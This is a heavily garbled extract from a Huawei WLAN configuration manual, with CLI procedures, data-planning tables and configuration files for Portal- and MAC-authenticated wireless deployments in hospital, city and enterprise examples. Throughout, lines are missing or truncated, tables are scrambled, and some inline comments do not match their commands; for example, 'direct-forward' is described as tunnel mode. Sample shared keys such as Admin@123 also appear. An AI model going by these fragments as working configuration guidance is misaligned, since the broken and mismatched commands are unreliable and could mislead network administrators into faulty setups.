[AC-authen-profile-portal1] portal-access-profile portal1
[AC-authen-profile-portal1] access-domain portal1 force //Configure the forcible
user domain portal1.
[AC-authen-profile-portal1] quit

[AC] wlan
[AC-wlan-regulate-domain-domain1] country-code cn //Configure the AC country
code. Radio features of APs managed by the AC must conform to local laws and
regulations. The default country code is CN.
e?[Y/N]:y
e?[Y/N]:y
[AC-wlan-view] quit

# Import the AP offline on the AC.

[AC] wlan
[AC-wlan-ap-101] ap-name ap-101
[AC-wlan-ap-101] ap-group ap-group1 //Add APs on the first floor to ap-group1.
[AC-wlan-view] ap-id 103 ap-mac dcd2-fc04-b520
[AC-wlan-ap-201] ap-group ap-group2 //Add APs on the second floor to ap-group2.
nor : normal [6]
----------------------------------------------------------------------------------
---------------
Uptime
----------------------------------------------------------------------------------
---------------
101 60de-4476-e320 ap-101 ap-group1 10.23.101.254 AP6010DN-AGN nor 0 10S
103 dcd2-fc04-b520 ap-103 ap-group1 10.23.101.252 AP6010DN-AGN nor 0 23S
203 dcd2-fc04-b540 ap-203 ap-group2 10.23.102.252 AP6010DN-AGN nor 0 55S
----------------------------------------------------------------------------------
---------------
Total: 6

# Configure the AP2010DN's uplink interface GE0/0/0 and downlink interfaces Eth0/0/0 and
Eth0/0/1 to allow wired service packets to pass through.
[AC-wlan-view] wired-port-profile name wired1
[AC-wlan-wired-port-wired1] vlan pvid 201 //The downlink interface of the
AP2010DN is used to connect wired terminals, such as the PCs. Set a PVID for the
interface. VLAN 201 is used to transmit wired service packets of the first floor.
[AC-wlan-wired-port-wired1] vlan untagged 201 //The downlink interface of the
AP2010DN is used to connect wired terminals. Add the interface to VLAN 201 in
untagged mode.
[AC-wlan-wired-port-wired1] quit
[AC-wlan-wired-port-wired2] vlan tagged 201 //The uplink interface of the
AP2010DN is used to connect to the upper-layer devices. Add the interface to VLAN
201 in tagged mode.
[AC-wlan-wired-port-wired3] vlan pvid 202 //The downlink interface of the
AP2010DN is used to connect wired terminals, such as the PCs. Set a PVID for the
interface. VLAN 202 is used to transmit wired service packets of the second floor.
[AC-wlan-wired-port-wired3] vlan untagged 202
[AC-wlan-wired-port-wired4] vlan tagged 202
[AC-wlan-view] ap-id 101
[AC-wlan-ap-101] wired-port-profile wired1 ethernet 0
[AC-wlan-ap-101] wired-port-profile wired2 gigabitethernet 0

# Create RRM profile rrm1.
[AC-wlan-view] rrm-profile name rrm1
[AC-wlan-rrm-prof-rrm1] calibrate auto-channel-select disable //Set the power
mode of the radio to fixed.
[AC-wlan-rrm-prof-rrm1] calibrate auto-txpower-select disable //Set the channel
[AC-wlan-rrm-prof-rrm1] quit
# Create radio profiles radio-2g and radio-5g and bind rrm1 to the radio files.
[AC-wlan-view] radio-2g-profile name radio-2g
[AC-wlan-radio-2g-prof-radio-2g] rrm-profile rrm1
[AC-wlan-radio-2g-prof-radio-2g] quit
[AC-wlan-view] security-profile name wlan-security //Portal authentication has


# Create SSID profile wlan-ssid and set the SSID name to hospital-wlan.
[AC-wlan-ssid-prof-wlan-ssid] ssid hospital-wlan //Set the SSID to hospital-wlan.
# Create traffic profile traffic1 and configure Layer 2 user isolation.

[AC-wlan-view] traffic-profile name traffic1
[AC-wlan-traffic-prof-traffic1] user-isolate l2
# Create VAP profiles wlan-vap1 and wlan-vap2, configure the data forwarding mode and
service VLANs, and apply the security profile, SSID profile, and authentication profile to the
VAP profile.
[AC-wlan-view] vap-profile name wlan-vap1
[AC-wlan-vap-prof-wlan-vap1] forward-mode tunnel //Set the service forwarding
mode to tunnel.
[AC-wlan-vap-prof-wlan-vap1] service-vlan vlan-id 101 //Set the VLAN ID to 101.
[AC-wlan-vap-prof-wlan-vap1] security-profile wlan-security
[AC-wlan-vap-prof-wlan-vap1] ssid-profile wlan-ssid
[AC-wlan-vap-prof-wlan-vap1] authentication-profile portal1
[AC-wlan-vap-prof-wlan-vap1] traffic-profile traffic1
[AC-wlan-vap-prof-wlan-vap1] quit
[AC-wlan-vap-prof-wlan-vap2] forward-mode tunnel //Set the service forwarding
mode to tunnel.
[AC-wlan-vap-prof-wlan-vap2] service-vlan vlan-id 102
[AC-wlan-vap-prof-wlan-vap2] authentication-profile portal1
# Bind VAP profile and radio profile to the AP group.

[AC-wlan-ap-group-ap-group1] vap-profile wlan-vap1 wlan 1 radio 0
[AC-wlan-ap-group-ap-group1] radio-2g-profile radio-2g

# Configure VAPs.
[AC-wlan-ap-101] radio 0
[AC-wlan-radio-101/0] eirp 10 //Configure the power based on the planning result
of the WLAN Planner.


[AC-wlan-radio-102/0] eirp 10
[AC-wlan-ap-103] radio 1 //The AP5030 supports two radios. This step configures
radio 1.


WID : WLAN ID
----------------------------------------------------------------------------------
----------------------------------------------------------------------------------
101 ap-101 0 1 60DE-4476-E320 ON OPEN 0 hospital-wlan
103 ap-103 0 1 DCD2-FC04-B520 ON OPEN 0 hospital-wlan
---------------------------------------------------------------------------------
Total: 8

# STAs discover the WLAN with the SSID hospital-wlan and associate with the WLAN. The
network. Run the display station all command on the AC. The command output shows that
the STAs have connected to the WLAN hospital-wlan.
[AC-wlan-view] display station all
----------------------------------------------------------------------------------
------------------------
address SSID
----------------------------------------------------------------------------------
------------------------
14cf-9208-9abf 0 ap-101 0/1 2.4G 11n 3/8 -70 10
10.23.101.254 hospital-wlan
----------------------------------------------------------------------------------
------------------------
Total: 1 2.4G: 1 5G: 0
----End
Configuration Files
#
sysname S5700-1
#
vlan batch 100 201
#
#
#
#
#
return

#
sysname S5700-2
#
vlan batch 100 202
#
#


#
#
#
return
#
sysname AC
#
vlan batch 100 to 102 200 to 202 300
#
authentication-profile name portal1
portal-access-profile portal1
access-domain portal1
access-domain portal1 force
#
dhcp enable
#
radius-server shared-key cipher %^%#ZGx{:~QFtUUhhG!`ba-
PTj=H1p_J<1/%ZAXuB5)0%^%#
weight 80
weight 80
radius-server authorization 10.23.200.1 shared-key cipher %^
%#w]=@OYp:T9"u@{I2RD4U5QJi2{u]$M{]DND|;=s"%^%#
#
server-ip 10.23.200.1
port 50100
shared-key cipher %^%#yJ0=%9W@FVMN/=HIR9EN@1abUN6>a(Bn@MHR7Bl4%^%#
url http://10.23.200.1:8080/portal
#
portal-access-profile name portal1
#
aaa
domain portal1
#
interface Vlanif100
description manage_ap
ip address 10.23.100.1 255.255.255.0
#
interface Vlanif101
ip address 10.23.101.1 255.255.255.0


#
interface Vlanif102
ip address 10.23.102.1 255.255.255.0
#
interface Vlanif200
ip address 10.23.200.2 255.255.255.0
#
interface Vlanif201
ip address 10.23.201.1 255.255.255.0
#
interface Vlanif202
ip address 10.23.202.1 255.255.255.0
#
#
#
#
#
#
wlan
traffic-profile name traffic1
user-isolate l2
ssid hospital-wlan
vap-profile name wlan-vap1
forward-mode tunnel
traffic-profile traffic1
authentication-profile portal1
forward-mode tunnel
rrm-profile name rrm1
calibrate auto-channel-select disable
calibrate auto-txpower-select disable
radio-2g-profile name radio-2g
rrm-profile rrm1
rrm-profile rrm1
wired-port-profile name wired1
vlan pvid 201
vlan untagged 201


vlan tagged 201
vlan pvid 202
vlan untagged 202
vlan tagged 202
radio 0
radio-2g-profile radio-2g
vap-profile wlan-vap1 wlan 1
radio 1
radio 2
radio 0
radio 1
radio 2
ap-name ap-101
ap-group ap-group1
wired-port-profile wired1 ethernet 0
wired-port-profile wired2 gigabitethernet 0
radio 0
channel 20mhz 1
eirp 10
ap-name ap-102
ap-group ap-group1
radio 0
channel 20mhz 6
eirp 10
ap-id 103 type-id 19 ap-mac dcd2-fc04-b520 ap-sn 210235419610CB002561
ap-name ap-103
ap-group ap-group1
radio 0
channel 20mhz 11
eirp 10
radio 1
channel 20mhz 153
eirp 10
ap-name ap-201
ap-group ap-group2
radio 0
channel 20mhz 1
eirp 10


ap-name ap-202
ap-group ap-group2
radio 0
channel 20mhz 6
eirp 10
ap-name ap-203
ap-group ap-group2
radio 0
channel 20mhz 11
eirp 10
radio 1
channel 20mhz 157
eirp 10
#
return
16.5 Example for Configuring WLAN Services for a

Wireless City Project (AC Bypass Deployment, Portal
Authentication)
WLAN Service Overview

You can configure WLAN services to allow wireless users to easily access a wireless network
and move around within the coverage area of the wireless network.
Configuration Notes


Configuration.


are
Versi
on
V200 S12700 V200R007C00:

AD9430DN-24, AD9430DN-12, R230D, R240D,
V200R006C20:
AD9430DN-24, AD9430DN-12, R230D, R240D
V200R006C10:
AP3030DN, AP2030DN
A city needs to deploy the wireless smart city project and requires that Portal authentication
be used for wireless users in the coverage area of the wireless network. Since a large number
of wireless users exist, high wireless service performance and Portal authentication
performance are required.
As shown in Figure 16-4, the S9700 core switch functions as the gateway for STAs and APs
and as the DHCP server to assign IP addresses to STAs and APs. The S9700 connects to APs
through PoE access switches S5700-1 and S5700-2. The AC and APs are located on a Layer 3
network. The AC is the X series card on the S9700 and connected to the S9700 through Eth-
Trunk in bypass mode.

transparently transmit data at Layer 2.
Figure 16-4 Networking diagram for configuring WLAN services for a wireless city project
In te rn e t
R o u te r
C o n tro lle r
AC
G E 2 /0 /1 G E 1 /0 /4
G E 1 /0 /5 G E 1 /0 /3
G E 1 /0 /6 G E 1 /0 /2
G E 2 /0 /2 G E 1 /0 /1
S9700
G E 0 /0 /1 G E 0 /0 /1
S 5 7 0 0 -1 S 5 7 0 0 -2
G E 0 /0 /2 G E 0 /0 /3 G E 0 /0 /2 G E 0 /0 /3
AP101 AP102 AP201 AP202
Data Planning
AC Eth-Trunk1 100 Configured to

improve network
bandwidth and
reliability
Add GE2/0/1 and
GE2/0/2 to Eth-
Trunk 1 and connect
the S9700.
S9700 GE1/0/1 10, 101 Connected to the

S5700-1


S5700-2

Controller

upper-layer network
Eth-Trunk1 100 Configured to

improve network
bandwidth and
reliability
Add GE1/0/5 and
GE1/0/6 to Eth-
Trunk 1 and connect
the AC.


source interface

regulatory domain
and radio-5g
l Name: ap-group2
regulatory domain
and radio-5g
Portal access profile l Name: portal1 -

Portal server templates
portal1 and portal3

l Name: portal2
Portal server templates
portal2 and portal3
Authentication profile l Name: portal1 -

portal1
l Name: portal2
portal2

l Country code: CN
RRM profile Name: rrm1 -
Radio profile l Name: radio-2g or -

radio-5g
l Referenced profile: RRM
profile rrm1

l Security and
OPEN

l SSID: hospital-wlan
Traffic profile Name: traffic1 -
VAP profile l Name: wlan-vap1 Provides WLAN network

101

l Name: wlan-vap2 Provides WLAN network

102
DHCP server The S9700 functions as the -

AP gateway and IP address VLANIF10: 10.23.10.1/24 Gateway and IP address

pool range 10.23.10.2-10.23.10.254/24 pool for AP101 and AP102
VLANIF20: 10.23.20.1/24 Gateway and IP address

10.23.20.2-10.23.20.254/24 pool for AP201 and AP202
STA gateway and IP address VLANIF101: -

pool range 10.23.101.1/24
10.23.101.2-10.23.101.254/
24
VLANIF102: -
10.23.102.1/24
10.23.102.2-10.23.102.254/
24
Server parameters Authentication server: l Three Service

l Active IP address: Controllers (SCs) are
10.23.30.1 deployed on the network.
Controller1 and
l Active IP address: Controller2 are used for
10.23.30.2 load balancing, and
l Standby IP address: Controller3 serves as a
10.23.30.3 backup for Controller1
l Port number: 1812 and Controller2.
l RADIUS shared key: l The Service Controller
Admin@123 (SC) of the Agile
Controller provides
RADIUS server and
Portal server functions;
therefore, IP addresses of


l Active IP address: authorization server, and
10.23.30.1 Portal server are all the
l Configure a RADIUS
10.23.30.2
l Standby IP address: collect user login and
10.23.30.3 logout information. The
l Port number: 1813 port numbers of the
Admin@123
be the same as those of
Authorization server: the RADIUS server.
l Active IP address: l Configure an
10.23.30.1 authorization server to
enable the RADIUS
server to deliver
10.23.30.2
authorization rules to the
l Standby IP address: AC. The shared key of
10.23.30.3 the authorization server
l RADIUS shared key: must be the same as
Admin@123 those of the
Portal server: accounting server.
10.23.30.1
10.23.30.2
l Standby IP address:
10.23.30.3
l Port number that the AC
uses to listen on Portal
protocol packets: 2000
l Destination port number
in the packets that the
server: 50100
Admin@123
server: Admin@123



Radio 1: channel 153 and locations, and the working
power level 10 channel and power of the
AP radio. Set the channel
Radio 1: channel 161 and channel and power for each
power level 10 AP.

power level 10
power level 10

power level 10
power level 10
1. Configure all network devices to enable the APs, S5700-1, S5700-2, S9700, and AC to
2. Configure the S9700 as a DHCP server to assign IP addresses to the STAs and APs.
Internet.
Procedure
[S5700-1] vlan batch 10 101

[S5700-2] vlan batch 20 102
# On the S9700, add GE1/0/1 connected to the S5700-1 to VLAN 10 and VLAN 101,
GE1/0/2 connected to the S5700-2 to VLAN 20 and VLAN 102, GE1/0/3 connected to the
Controller to VLAN 300, GE1/0/4 connected to the upper-layer network to VLAN 101 and
VLAN 102, and GE1/0/5 and GE1/0/6 connected to the AC to Eth-Trunk 1. Add Eth-Trunk 1
to VLAN 100.
[HUAWEI] sysname S9700
[S9700] vlan batch 10 20 100 101 102 300
[S9700-GigabitEthernet1/0/3] port trunk allow-pass vlan 300
[S9700] interface eth-trunk 1
[S9700-Eth-Trunk1] port link-type trunk
[S9700-Eth-Trunk1] port trunk allow-pass vlan 100

[S9700-Eth-Trunk1] trunkport gigabitethernet 1/0/5 1/0/6 //Add GE1/0/5 and

[S9700-Eth-Trunk1] quit
# On the S9700, configure VLANIF 100 for communication with the AC and VLANIF 300
for communication with the Controller.
communication between the S9700 and Controller.
# On the AC, add GE2/0/1 and GE2/0/2 connected to the S9700 to Eth-Trunk 1 and add Eth-
Trunk 1 to VLAN 100.
[HUAWEI] sysname AC
[AC] vlan batch 100
[AC] interface eth-trunk 1
[AC-Eth-Trunk1] port link-type trunk
[AC-Eth-Trunk1] port trunk allow-pass vlan 100
[AC-Eth-Trunk1] trunkport gigabitethernet 2/0/1 2/0/2 //Add GE2/0/1 and GE2/0/2
to Eth-Trunk1.
[AC-Eth-Trunk1] quit
# Configure VLANIF 100 on the AC for communication with the S9700.

[AC-Vlanif100] quit
Step 2 Configure the S9700 as a DHCP server to assign IP addresses to APs and STAs.
# Configure the S9700 to assign IP addresses to the STAs and APs from the global address
pool.
[S9700] dhcp enable
advertise the AC's IP address to APs.
advertise the AC¡¯s IP address to the APs.


# Configure a default route to the S9700 on the AC.

[AC] radius-server template radius1 //Create the RADIUS server template radius1.
address 10.23.100.1 weight 20 //Configure the standby RADIUS authentication
server, with the weight value lower than the active authentication server. Set
the authentication port number to 1812. The AC uses the IP address 10.23.100.1 to
communicate with the standby RADIUS authentication server.
10.23.100.1 weight 20 //Configure the standby RADIUS accounting server, with
the weight value lower than the active accounting server. Set the accounting port
number to 1813. The AC uses the IP address 10.23.100.1 to communicate with the
standby RADIUS accounting server.
[AC-radius-radius1] radius-server detect-server interval 30 //Set the RADIUS
automatic detection interval to 30s. The default value is 60s.
[AC] aaa
radius1.
[AC-aaa-authen-radius1] authentication-mode radius //If the Controller


[AC-aaa-accounting-radius1] accounting realtime 15 //Enable real-time
accounting and set the accounting interval to 15 minutes. By default, real-time
accounting is disabled.
scheme radius1.
radius1.
radius1.
[AC-aaa] quit
# Configure a Portal server template for each of the three Controllers.

Controller1.
the Portal server.
URL to the Portal server.
[AC-web-auth-server-portal1] server-detect interval 30 action log //Set the
RADIUS automatic detection interval to 30s. The default value is 60s.
Controller2.
Controller3.
# Configure Portal authentication.

[AC-portal-acces-profile-portal1] web-auth-server portal1 portal3 layer3 //Bind
the Portal server template portal1 and portal3.
[AC-portal-acces-profile-portal2] web-auth-server portal2 portal3 layer3
[AC-authen-profile-portal1] access-domain portal1 force //Configure the forcible
user domain portal1.
[AC-authen-profile-portal1] access-domain portal1 //Configure the default user
domain portal1.
[AC-authen-profile-portal2] access-domain portal1 force

[AC-authen-profile-portal2] access-domain portal1

# Bind the authentication files to the service VLANIF interfaces.

[AC-Vlanif101] authentication-profile portal1
[AC-Vlanif101] quit
[AC-Vlanif102] authentication-profile portal2
[AC-Vlanif102] quit

[AC] wlan
[AC-wlan-regulate-domain-domain1] country-code cn //Configure the AC country
code. Radio features of APs managed by the AC must conform to local laws and
regulations. The default country code is CN.
e?[Y/N]:y
e?[Y/N]:y
[AC-wlan-view] quit

# Import the AP offline on the AC.

[AC] wlan
[AC-wlan-ap-101] ap-group ap-group1 //Add APs on the first floor to ap-group1.
[AC-wlan-ap-201] ap-group ap-group2 //Add APs on the second floor to ap-group2.

nor : normal [4]
----------------------------------------------------------------------------------
---------------
Uptime
----------------------------------------------------------------------------------
---------------
----------------------------------------------------------------------------------
---------------
Total: 4
# Create RRM profile rrm1.

[AC-wlan-view] rrm-profile name rrm1
[AC-wlan-rrm-prof-rrm1] calibrate auto-channel-select disable //Set the power
[AC-wlan-rrm-prof-rrm1] calibrate auto-txpower-select disable //Set the channel
[AC-wlan-rrm-prof-rrm1] quit
# Create radio profiles radio-2g and radio-5g and bind rrm1 to the radio files.
[AC-wlan-view] security-profile name wlan-security //Portal authentication has
# Create SSID profile wlan-ssid and set the SSID name to city-wlan.
[AC-wlan-ssid-prof-wlan-ssid] ssid city-wlan //Set the SSID to city-wlan.
# Create traffic profile traffic1 and configure Layer 2 user isolation.

[AC-wlan-view] traffic-profile name traffic1

[AC-wlan-traffic-prof-traffic1] user-isolate l2
# Create VAP profiles wlan-vap1 and wlan-vap2, configure the data forwarding mode and
service VLANs, and apply the security profile, SSID profile, and authentication profile to the
VAP profile.
[AC-wlan-vap-prof-wlan-vap1] forward-mode direct-forward //Set the service
forwarding mode to tunnel.
[AC-wlan-vap-prof-wlan-vap1] service-vlan vlan-id 101 //Set the VLAN ID to 101.
[AC-wlan-vap-prof-wlan-vap2] forward-mode direct-forward //Set the service
forwarding mode to tunnel.
# Bind VAP profile and radio profile to the AP group.


# Configure VAPs.
[AC-wlan-radio-101/0] eirp 10 //Configure the power based on the planning result
of the WLAN Planner.




WID : WLAN ID
----------------------------------------------------------------------------------
----------------------------------------------------------------------------------
101 ap-101 0 1 60DE-4476-E320 ON OPEN 0 city-wlan
----------------------------------------------------------------------------------
Total: 8
# STAs discover the WLAN with the SSID city-wlan and associate with the WLAN. The
network. Run the display station all command on the AC. The command output shows that
the STAs have connected to the WLAN city-wlan.
[AC-wlan-view] display station all
----------------------------------------------------------------------------------
------------------------
address SSID
----------------------------------------------------------------------------------
------------------------
14cf-9208-9abf 0 ap-101 0/1 2.4G 11n 3/8 -70 10
10.23.101.254 city-wlan
----------------------------------------------------------------------------------
------------------------
Total: 1 2.4G: 1 5G: 0
----End

Configuration Files
#
sysname S5700-1
#
vlan batch 10 101
#
#
#
#
return

#
sysname S5700-2
#
vlan batch 20 102
#
#
#
#
return
l Configuration file of the S9700

#
sysname S9700
#
vlan batch 10 20 100 to 102 300
#
dhcp enable
#
ip pool manage_ap1
network 10.23.10.0 mask 255.255.255.0
#
ip pool manage_ap2
network 10.23.20.0 mask 255.255.255.0
#

network 10.23.101.0 mask 255.255.255.0
#
network 10.23.102.0 mask 255.255.255.0
#
interface Vlanif10
ip address 10.23.10.1 255.255.255.0
dhcp select global
#
interface Vlanif20
ip address 10.23.20.1 255.255.255.0
dhcp select global
#
interface Vlanif100
ip address 10.23.100.10 255.255.255.0
#
interface Vlanif101
ip address 10.23.101.1 255.255.255.0
dhcp select global
#
interface Vlanif102
ip address 10.23.102.1 255.255.255.0
dhcp select global
#
interface Vlanif300
ip address 10.23.30.10 255.255.255.0
#
#
#
#
#
#
eth-trunk 1
#
eth-trunk 1
#
return
#
sysname AC
#
#


#
radius-server shared-key cipher %^%#~!W(.rpP$Psx"U>yy2uGMbJf-c.>vIWU[@V85Qe*
%^%#
weight 80
weight 80
weight 20
weight 80
weight 80
weight 20
radius-server detect-server interval 30
#
port 50100
shared-key cipher %^%#T)1I)52A-*iIrZ>='1l:P[[TYo!BX7_Z/AJkCGxC%^%#
url http://10.23.30.1:8080/portal
#
port 50100
shared-key cipher %^%#"xJ,SrfdB4>n]ZAJ@|0IG`g@JAT"m81Jv8R3I{CM%^%#
url http://10.23.30.2:8080/portal
#
port 50100
shared-key cipher %^%#dS6|(!NeF>qv;O7bJ[5D^QF"5#Na<,AG4b~y@3[(%^%#
url http://10.23.30.3:8080/portal
#
#
#
aaa
domain portal1
#
interface Vlanif100
ip address 10.23.100.1 255.255.255.0
#
interface Vlanif101
#
interface Vlanif102

#
#
eth-trunk 1
#
eth-trunk 1
#
ip route-static 0.0.0.0 0.0.0.0 10.23.100.10
#
#
wlan
traffic-profile name traffic1
user-isolate l2
ssid-profile name default
rrm-profile name rrm1
calibrate auto-channel-select disable
calibrate auto-txpower-select disable
rrm-profile rrm1
rrm-profile rrm1
radio 0
radio 1
radio 2
radio 0
radio 1
radio 2
ap-id 101 ap-mac 60de-4476-e320 ap-sn 210235419610CB002000
ap-name ap-101
ap-group ap-group1
radio 0

channel 20mhz 1
eirp 10
radio 1
channel 20mhz 153
eirp 10
ap-name ap-102
ap-group ap-group1
radio 0
channel 20mhz 6
eirp 10
radio 1
channel 20mhz 161
eirp 10
ap-name ap-201
ap-group ap-group2
radio 0
channel 20mhz 1
eirp 10
radio 1
channel 20mhz 153
eirp 10
ap-name ap-202
ap-group ap-group2
radio 0
channel 20mhz 6
eirp 10
radio 1
channel 20mhz 161
eirp 10
#
return
16.6 Example for Configuring MAC Address

Authentication on the Wireless Side
MAC Address Authentication on the Wireless Side Overview

MAC address authentication controls a user's network access rights based on the user's
interface and MAC address. The user does not need to install any client software. The device
starts authenticating a user when detecting the user's MAC address for the first time on the
interface where MAC address authentication has been enabled. During the authentication
process, the user does not need to enter a user name or password.
Configuration Notes
l In this example, MAC address authentication is used. To ensure network security,
configure an appropriate security policy according to service requirements.

Configuration.


are
Versi
on
V200 S12700 V200R007C00:

AD9430DN-24, AD9430DN-12, R230D, R240D,
V200R006C20:
AD9430DN-24, AD9430DN-12, R230D, R240D
V200R006C10:
AP3030DN, AP2030DN
As shown in Figure 16-5, an AC in an enterprise is connected to the AP through access
switch SwitchA. The enterprise deploys the WLAN wlan-net to provide wireless network
access for employees. The AC functions as the DHCP server to assign IP addresses on the
network segment 10.23.101.0/24 to wireless users.
Because the WLAN is open to users, there are potential security risks to enterprise
information if no access control is configured for the WLAN. To meet the enterprise's security
requirements, configure MAC address authentication to authenticate dumb terminals such as
wireless network printers and wireless phones that cannot have an authentication client

installed. MAC addresses of terminals are used as user information and sent to the RADIUS
server for authentication. When users connect to the WLAN, authentication is not required.
Figure 16-5 Networking diagram for configuring MAC address authentication on the wireless
side
R A D IU S se rve r
1 0 .2 3 .2 0 0 .1 :1 8 1 2
In tra n e t
G E 1 /0 /2
VLAN 101
AC
G E 1 /0 /1
G E 0 /0 /2 VLAN 100
VLAN 100
S w itch A
G E 0 /0 /1
VLAN 100
AP
a re a _ 1
STA STA
M anagem ent VLAN: VLAN 100
Context
Table 16-14 Data plan

Item Data
RADIUS Name of the RADIUS authentication scheme: radius_huawei

authenticati Name of the RADIUS server template: radius_huawei
on
parameters l IP address: 10.23.200.1
l Shared key: Huawei@123
AAA domain: huawei.com
MAC l Name: m1
access l User name and password for MAC address authentication: MAC
profile addresses without hyphens (-)

Item Data
Authenticati l Name: p1
on profile l Bound profile: MAC access profile m1
l Forcible authentication domain: huawei.com
DHCP The AC functions as the DHCP server to assign IP addresses to the AP and
server STAs.
IP address 10.23.100.2 to 10.23.100.254/24

pool for the
AP
IP address 10.23.101.2 to 10.23.101.254/24

pool for the
STAs
IP address VLANIF 100: 10.23.100.1/24

of the AC's
source
interface

l Bound profile: VAP profile wlan-vap and regulatory domain profile
domain1

profile


profile l Security policy: Open

l Bound profile: SSID profile wlan-ssid, security profile wlan-security,
and authentication profile p1
1. Configure basic WLAN services so that the AC can communicate with upper-layer and
lower-layer devices and the AP can go online.
2. Configure RADIUS authentication parameters.
3. Configure a MAC access profile to manage MAC access control parameters.
4. Configure an authentication profile to manage NAC configuration.
5. Configure WLAN service parameters, and bind a security policy profile and an
authentication profile to a VAP profile to control access from STAs.

Procedure

[HUAWEI] sysname AC

NOTE

VLANIF 101.
[AC-Vlanif100] quit
[AC-Vlanif101] quit
Step 4 Configure a route from the AC to the RADIUS server (Assume that the IP address of the
upper-layer device connected to the AC is 10.23.101.2).


[AC] wlan
e?[Y/N]:y
[AC-wlan-view] quit

NOTE
radio).
[AC] wlan
[AC-wlan-ap-0] quit
nor : normal [1]
----------------------------------------------------------------------------------
---
Uptime
----------------------------------------------------------------------------------
---
----------------------------------------------------------------------------------
---
Total: 1
Step 6 Configure a RADIUS server template, and a RADIUS authentication scheme.

NOTE
Ensure that the RADIUS server IP address, port number, and shared key are configured correctly and are
the same as those on the RADIUS server.

# Configure a RADIUS server template.

[AC-radius-radius_huawei] radius-server shared-key cipher Huawei@123
# Configure a RADIUS authentication scheme.

[AC] aaa
# Create an AAA domain and configure the RADIUS server template and authentication
scheme.
[AC-aaa] quit
Step 7 Configure the MAC access profile m1.

NOTE
MAC address authentication.
[AC] mac-access-profile name m1
[AC-mac-access-profile-m1] quit
Step 8 Configure the authentication profile p1.

[AC-authen-profile-p1] mac-access-profile m1
[AC-authen-profile-p1] access-domain huawei.com mac-authen force

# Create security profile wlan-security and set the security policy in the profile. By default,
the security policy is open system.
[AC] wlan
[AC-wlan-ssid-prof-wlan-ssid] ssid wlan-net
# Create VAP profile wlan-vap, configure the data forwarding mode and service VLANs, and
apply the security profile, SSID profile, and authentication profile to the VAP profile.
[AC-wlan-vap-prof-wlan-vap] forward-mode tunnel
[AC-wlan-vap-prof-wlan-vap] service-vlan vlan-id 101
the AP.




After dumb terminals associate with the WLAN, authentication is performed automatically.
Users can directly access the network after the authentication succeeds.
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 100
#
#
#
return

#
sysname AC
#
#
access-domain huawei.com mac-authen force
#
dhcp enable
#
radius-server shared-key cipher %^%#Oc6_BMCw#9gZ2@SMVtk!PAC6>Ou*eLW/"qLp+f#$
%^%#
#
#
aaa
domain huawei.com
#
interface Vlanif100
ip address 10.23.100.1 255.255.255.0
#
interface Vlanif101
ip address 10.23.101.1 255.255.255.0


#
#
#
ip route-static 10.23.200.0 255.255.255.0 10.23.101.2
#
#
wlan
ssid wlan-net
forward-mode tunnel
radio 0
radio 1
ap-id 0 ap-mac 60de-4476-e360
ap-name area_1
ap-group ap-group1
#
return
16.7 Example for Configuring Portal Authentication on the

Wireless Side
Portal Authentication on the Wireless Side Overview

Portal authentication is also called web authentication. Generally, Portal authentication
websites are also called Portal websites. When users go online, they must be authenticated on
Portal websites. The users can use network resources only after they pass the authentication.
A user can access a known Portal authentication website and enter a user name and password
for authentication. This mode is called active authentication. If a user attempts to access other
external networks through HTTP, the device forcibly redirects the user to the Portal
authentication website for Portal authentication. This mode is called forcible authentication.
Configuration Notes


Configuration.


are
Versi
on
V200 S12700 V200R007C00:

AD9430DN-24, AD9430DN-12, R230D, R240D,
V200R006C20:
AD9430DN-24, AD9430DN-12, R230D, R240D
V200R006C10:
AP3030DN, AP2030DN
As shown in Figure 16-6, there are a large number of STAs on an enterprise network. A
WLAN with the SSID guest is deployed in the lobby of the office building to provide
wireless access services for guests. A WLAN with the SSID employee is deployed in office
areas to provide wireless access services for employees.
To ensure network security, the enterprise needs to deploy an authentication system to
implement access control for all the wireless users who attempt to connect to the enterprise
network. Only authenticated users can connect to the enterprise network. Considering the
mobility feature of a large number of STAs, the administrator decides to configure Portal
authentication on the AC at Layer 3 network to control access.

Figure 16-6 Networking diagram for configuring Portal authentication on the wireless side
In tra n e t
R o u te r
G E 2 /0 /0
V L A N IF 2 0 1 ： 1 0 .6 7 .2 0 1 .1 /2 4
S e rve r a re a (P o rta l, R A D IU S , D N S ...)
G E 1 /0 /3 G E 1 /0 /2 G E 1 /0 /1
V L A N IF 2 0 1 ： 1 0 .6 7 .2 0 1 .2 /2 4 V L A N IF 2 0 0 VLAN 200
1 0 .4 5 .2 0 0 .2 /2 4 1 0 .4 5 .2 0 0 .1 /2 4
S w itc h _ B
G E 1 /0 /1 AC
V L A N IF 1 0 0 ： 1 0 .2 3 .1 0 0 .1 /2 4
V L A N IF 1 0 1 ： 1 0 .2 3 .1 0 1 .1 /2 4
V L A N IF 1 0 2 ： 1 0 .2 3 .1 0 2 .1 /2 4
G E 0 /0 /5
S w itc h _ A
G E 0 /0 /1 G E 0 /0 /4
G E 0 /0 /2
G E 0 /0 /3
AP: AP: AP: AP:

lo b b y _ 1 lo b b y _ 2 o ffic e 2 _ 1 o ffic e 2 _ 2
STA STA STA STA

M anagem ent VLAN : 100
M anagem ent VLAN : 100
S e rv ic e V L A N : V L A N p o o l
S e rv ic e V L A N : V L A N p o o l
Lobby O ffic e a re a
Context

Item Data
RADIUS Name of the RADIUS authentication scheme: radius_huawei

authentication Name of the RADIUS server template: radius_huawei
parameters

Item Data
Portal server profile l Name: abc

l Destination port number in the packets that the AC sends to
the Portal server: 50200
l Portal shared key: Admin@123
Portal access profile l Name: portal1

l Bound profile: Portal server profile abc
Authentication-free l Name: default_free_rule

rule profile l Authentication-free resource: IP address of the DNS server
(172.16.1.2)
Authentication profile l Name: p1

l Bound profile: Portal access profile p1, and authentication-
free rule profile default_free_rule
l Forcible authentication domain: huawei.com
DHCP server The router functions as the DHCP server to assign IP addresses
to the STAs and APs.
IP address pool for the 10.23.100.2 to 10.23.100.254/24

APs
IP address pool for the 10.23.101.2 to 10.23.101.254/24

STAs 10.23.102.2 to 10.23.102.254/24
VLAN pool Name: sta-pool

VLANs added to the VLAN pool: VLAN 101 and VLAN 102
IP address of the AC's VLANIF100: 10.45.200.1/24

source interface
AP group Name: guest

Bound profile: VAP profile guest and regulatory domain profile
domain1
Name: employee
Bound profile: VAP profile employee and regulatory domain
profile domain1
Regulatory domain Name: domain1

profile Country code: CN
SSID profile Name: guest

SSID name: guest
Name: employee
SSID name: employee

Item Data
Security profile l Name: wlan-security

l Security policy: Open
VAP profile Name: guest

l Service VLAN: VLANs in the VLAN pool
